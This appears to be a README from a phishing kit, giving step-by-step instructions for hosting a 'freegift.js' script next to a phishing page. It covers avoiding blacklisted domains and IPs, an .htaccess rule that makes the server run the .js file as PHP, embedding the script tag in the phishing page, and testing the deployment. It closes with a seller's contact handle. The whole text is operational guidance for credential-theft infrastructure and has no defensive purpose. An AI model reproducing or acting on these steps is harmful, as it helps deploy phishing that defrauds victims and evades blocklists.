
remember not to use blacklisted domain and ip address..

becareful not to break the code.. only make change to img.src to replace your domain..
make sure to view code to see how to do it ....

STEPS TO USE THIS CODE WITH YOUR PHISHING PAGE...
Step 1: scrip usage..

    use the script in the this folder with your phishing page.
    Save the file to a directory on the web hosting platform, for example, /public_html/freegift/. (or any name you desire)

Step 2:  phishing page

    prepare to host your phishing page on you webhost(cpannel or shell or any webhost you desire).
    Save the file to a different directory on the web hosting platform, for example, /public_html/phishing/.

Step 3: Configure the freegift file

    Configure the freegift file to be executed by the web hosting platform. This can be done by adding a .htaccess file to the /public_html/freegift/ directory with the following code:

bash
AddHandler application/x-httpd-php .js
This will tell the web hosting platform to execute the freegift.js file as a PHP script.( Different webhost might have different ways to do this. findout from your provider how to do this if you dont know )_

Step 4: Configure the phishing page

    Configure the phishing page to include the freegift file. This can be done by adding a script tag to the index.html of your phishing page file that points to the freegift.js file:

html
<script src="https://example.com/freegift/freegift.js"></script>
Replace example.com with your domain....


Step 5: Upload the files

    Upload the freegitf.js file to the /public_html/freegift/ directory on the web hosting platform.
    Upload the phishing_page file to the /public_html/phishing/ directory on the web hosting platform.

Step 6: Test the setup

    Test the setup by accessing the phishing page in a web browser. The freegift file should be executed and the phishing page should be displayed.

Here's an example of what the directory structure could look like:

/public_html/
|-- freegift/
|   |-- freegift.js
|   |-- .htaccess
|-- phishing/
|   |-- phishing_page
|-- index.html

if you need more anwsers reach me out @Hac_Me
